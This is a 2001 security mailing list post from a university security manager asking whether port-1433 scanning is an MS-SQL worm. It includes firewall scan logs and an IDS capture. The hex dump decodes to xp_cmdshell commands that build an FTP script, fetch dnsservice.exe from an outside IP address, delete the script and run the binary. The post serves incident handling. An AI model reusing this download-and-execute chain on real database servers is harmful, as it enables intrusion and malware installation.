Security Incidents mailing list archives

MS-SQL Worm?

From: "Douglas P. Brown" <dugbrown () email unc edu>
Date: Tue, 20 Nov 2001 09:54:18 -0500

We saw a scan come in looking for systems answering on 1433, and
immediately saw several systems start scanning out for other systems
answering on 1433 - worm behavior?  Has anyone else seen this?

thanks,
-Doug
-- 
Douglas P. Brown
University of North Carolina
Manager of Security Resources
105 Abernethy Hall


Nov 20 09:38:19 x.x.92.228:2884 -> x.x.90.70:1433 SYN ******S*
Nov 20 09:38:19 x.x.92.228:2886 -> x.x.92.70:1433 SYN ******S*
Nov 20 09:38:20 x.x.202.182:2503 -> x.x.73.109:1433 SYN ******S*
Nov 20 09:38:20 x.x.202.182:2507 -> x.x.77.109:1433 SYN ******S*
Nov 20 09:38:20 x.x.202.182:2506 -> x.x.76.109:1433 SYN ******S*
Nov 20 09:38:20 x.x.202.182:2528 -> x.x.96.109:1433 SYN ******S*
Nov 20 09:38:21 x.x.92.228:2904 -> x.x.110.70:1433 SYN ******S*
Nov 20 09:38:21 x.x.92.228:2905 -> x.x.111.70:1433 SYN ******S*
Nov 20 09:38:21 x.x.92.228:2906 -> x.x.112.70:1433 SYN ******S*
Nov 20 09:38:21 x.x.92.228:2907 -> x.x.113.70:1433 SYN ******S*
Nov 20 09:38:21 x.x.92.228:2909 -> x.x.115.70:1433 SYN ******S*
Nov 20 09:38:21 x.x.92.228:2908 -> x.x.114.70:1433 SYN ******S*
Nov 20 09:38:21 x.x.92.228:2910 -> x.x.116.70:1433 SYN ******S*
Nov 20 09:38:22 x.x.92.228:2911 -> x.x.117.70:1433 SYN ******S*
Nov 20 09:38:22 x.x.92.228:2913 -> x.x.119.70:1433 SYN ******S*
Nov 20 09:38:22 x.x.92.228:2912 -> x.x.118.70:1433 SYN ******S*
Nov 20 09:38:22 x.x.92.228:2915 -> x.x.121.70:1433 SYN ******S*
Nov 20 09:38:22 x.x.92.228:2914 -> x.x.120.70:1433 SYN ******S*
Nov 20 09:38:22 x.x.92.228:2916 -> x.x.122.70:1433 SYN ******S*
Nov 20 09:38:22 x.x.92.228:2917 -> x.x.123.70:1433 SYN ******S*
Nov 20 09:38:21 x.x.202.182:2532 -> x.x.99.109:1433 SYN ******S*
Nov 20 09:38:21 x.x.202.182:2533 -> x.x.100.109:1433 SYN ******S*
Nov 20 09:38:21 x.x.202.182:2535 -> x.x.102.109:1433 SYN ******S*
Nov 20 09:38:21 x.x.202.182:2538 -> x.x.105.109:1433 SYN ******S*
Nov 20 09:38:21 x.x.202.182:2539 -> x.x.106.109:1433 SYN ******S*

[**] MS-SQL xp_cmdshell - program execution [**]
11/20-08:01:48.923210 x.x.92.228:3348 -> x.x.200.115:1433
TCP TTL:127 TOS:0x0 ID:45385 IpLen:20 DgmLen:972 DF
***AP*** Seq: 0x318F3D1  Ack: 0x1E5807AD  Win: 0x2098  TcpLen: 20
03 01 03 A4 00 00 01 00 0A 00 73 00 70 00 5F 00  ..........s.p._.
70 00 72 00 65 00 70 00 61 00 72 00 65 00 00 00  p.r.e.p.a.r.e...
00 01 26 04 00 00 00 63 00 00 00 00 FF FF FF FF  ..&....c........
00 00 63 62 03 00 00 62 03 00 00 65 00 78 00 65  ..cb...b...e.x.e
00 63 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64  .c. .x.p._.c.m.d
00 73 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65  .s.h.e.l.l. .'.e
00 63 00 68 00 6F 00 20 00 66 00 74 00 70 00 3E  .c.h.o. .f.t.p.>
00 20 00 66 00 74 00 70 00 2E 00 78 00 27 00 0A  . .f.t.p...x.'..
00 65 00 78 00 65 00 63 00 20 00 78 00 70 00 5F  .e.x.e.c. .x.p._
00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00 6C  .c.m.d.s.h.e.l.l
00 20 00 27 00 65 00 63 00 68 00 6F 00 20 00 66  . .'.e.c.h.o. .f
00 6F 00 6F 00 2E 00 63 00 6F 00 6D 00 3E 00 3E  .o.o...c.o.m.>.>
00 20 00 66 00 74 00 70 00 2E 00 78 00 27 00 0A  . .f.t.p...x.'..
00 65 00 78 00 65 00 63 00 20 00 78 00 70 00 5F  .e.x.e.c. .x.p._
00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00 6C  .c.m.d.s.h.e.l.l
00 20 00 27 00 65 00 63 00 68 00 6F 00 20 00 62  . .'.e.c.h.o. .b
00 69 00 6E 00 3E 00 3E 00 20 00 66 00 74 00 70  .i.n.>.>. .f.t.p
00 2E 00 78 00 27 00 0A 00 65 00 78 00 65 00 63  ...x.'...e.x.e.c
00 20 00 78 00 70 00 5F 00 63 00 6D 00 64 00 73  . .x.p._.c.m.d.s
00 68 00 65 00 6C 00 6C 00 20 00 27 00 65 00 63  .h.e.l.l. .'.e.c
00 68 00 6F 00 20 00 63 00 64 00 20 00 70 00 75  .h.o. .c.d. .p.u
00 62 00 3E 00 3E 00 20 00 66 00 74 00 70 00 2E  .b.>.>. .f.t.p..
00 78 00 27 00 0A 00 65 00 78 00 65 00 63 00 20  .x.'...e.x.e.c.
00 78 00 70 00 5F 00 63 00 6D 00 64 00 73 00 68  .x.p._.c.m.d.s.h
00 65 00 6C 00 6C 00 20 00 27 00 65 00 63 00 68  .e.l.l. .'.e.c.h
00 6F 00 20 00 63 00 64 00 20 00 74 00 6D 00 70  .o. .c.d. .t.m.p
00 3E 00 3E 00 20 00 66 00 74 00 70 00 2E 00 78  .>.>. .f.t.p...x
00 27 00 0A 00 65 00 78 00 65 00 63 00 20 00 78  .'...e.x.e.c. .x
00 70 00 5F 00 63 00 6D 00 64 00 73 00 68 00 65  .p._.c.m.d.s.h.e
00 6C 00 6C 00 20 00 27 00 65 00 63 00 68 00 6F  .l.l. .'.e.c.h.o
00 20 00 67 00 65 00 74 00 20 00 64 00 6E 00 73  . .g.e.t. .d.n.s
00 73 00 65 00 72 00 76 00 69 00 63 00 65 00 2E  .s.e.r.v.i.c.e..
00 65 00 78 00 65 00 3E 00 3E 00 20 00 66 00 74  .e.x.e.>.>. .f.t
00 70 00 2E 00 78 00 27 00 0A 00 65 00 78 00 65  .p...x.'...e.x.e
00 63 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64  .c. .x.p._.c.m.d
00 73 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65  .s.h.e.l.l. .'.e
00 63 00 68 00 6F 00 20 00 63 00 6C 00 6F 00 73  .c.h.o. .c.l.o.s
00 65 00 20 00 3E 00 3E 00 20 00 66 00 74 00 70  .e. .>.>. .f.t.p
00 2E 00 78 00 27 00 0A 00 65 00 78 00 65 00 63  ...x.'...e.x.e.c
00 20 00 78 00 70 00 5F 00 63 00 6D 00 64 00 73  . .x.p._.c.m.d.s
00 68 00 65 00 6C 00 6C 00 20 00 27 00 65 00 63  .h.e.l.l. .'.e.c
00 68 00 6F 00 20 00 71 00 75 00 69 00 74 00 20  .h.o. .q.u.i.t.
00 3E 00 3E 00 20 00 66 00 74 00 70 00 2E 00 78  .>.>. .f.t.p...x
00 27 00 0A 00 65 00 78 00 65 00 63 00 20 00 78  .'...e.x.e.c. .x
00 70 00 5F 00 63 00 6D 00 64 00 73 00 68 00 65  .p._.c.m.d.s.h.e
00 6C 00 6C 00 20 00 27 00 66 00 74 00 70 00 20  .l.l. .'.f.t.p.
00 2D 00 73 00 3A 00 66 00 74 00 70 00 2E 00 78  .-.s.:.f.t.p...x
00 20 00 32 00 30 00 37 00 2E 00 32 00 39 00 2E  . .2.0.7...2.9..
00 31 00 39 00 32 00 2E 00 31 00 36 00 30 00 27  .1.9.2...1.6.0.'
00 0A 00 65 00 78 00 65 00 63 00 20 00 78 00 70  ...e.x.e.c. .x.p
00 5F 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C  ._.c.m.d.s.h.e.l
00 6C 00 20 00 27 00 64 00 65 00 6C 00 20 00 66  .l. .'.d.e.l. .f
00 74 00 70 00 2E 00 78 00 27 00 0A 00 65 00 78  .t.p...x.'...e.x
00 65 00 63 00 20 00 78 00 70 00 5F 00 63 00 6D  .e.c. .x.p._.c.m
00 64 00 73 00 68 00 65 00 6C 00 6C 00 20 00 27  .d.s.h.e.l.l. .'
00 73 00 74 00 61 00 72 00 74 00 20 00 64 00 6E  .s.t.a.r.t. .d.n
00 73 00 73 00 65 00 72 00 76 00 69 00 63 00 65  .s.s.e.r.v.i.c.e
00 2E 00 65 00 78 00 65 00 27 00 0A 00 00 00 38  ...e.x.e.'.....8
01 00 00 00                                      ....

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Current thread:

MS-SQL Worm? Douglas P. Brown (Nov 20)
- Re: MS-SQL Worm? Paul Nasrat (Nov 20)
  - Re: MS-SQL Worm? Arthur Donkers (Nov 20)
    - Re: MS-SQL Worm? Patrick Andry (Nov 20)
    - Re: MS-SQL Worm? Johannes Verelst (Nov 20)
    - Re: MS-SQL Worm? Unknown (Nov 20)
- Re: MS-SQL Worm? Arthur Donkers (Nov 20)
- Re: MS-SQL Worm? Arthur Donkers (Nov 20)
- Re: MS-SQL Worm? jabba (Nov 20)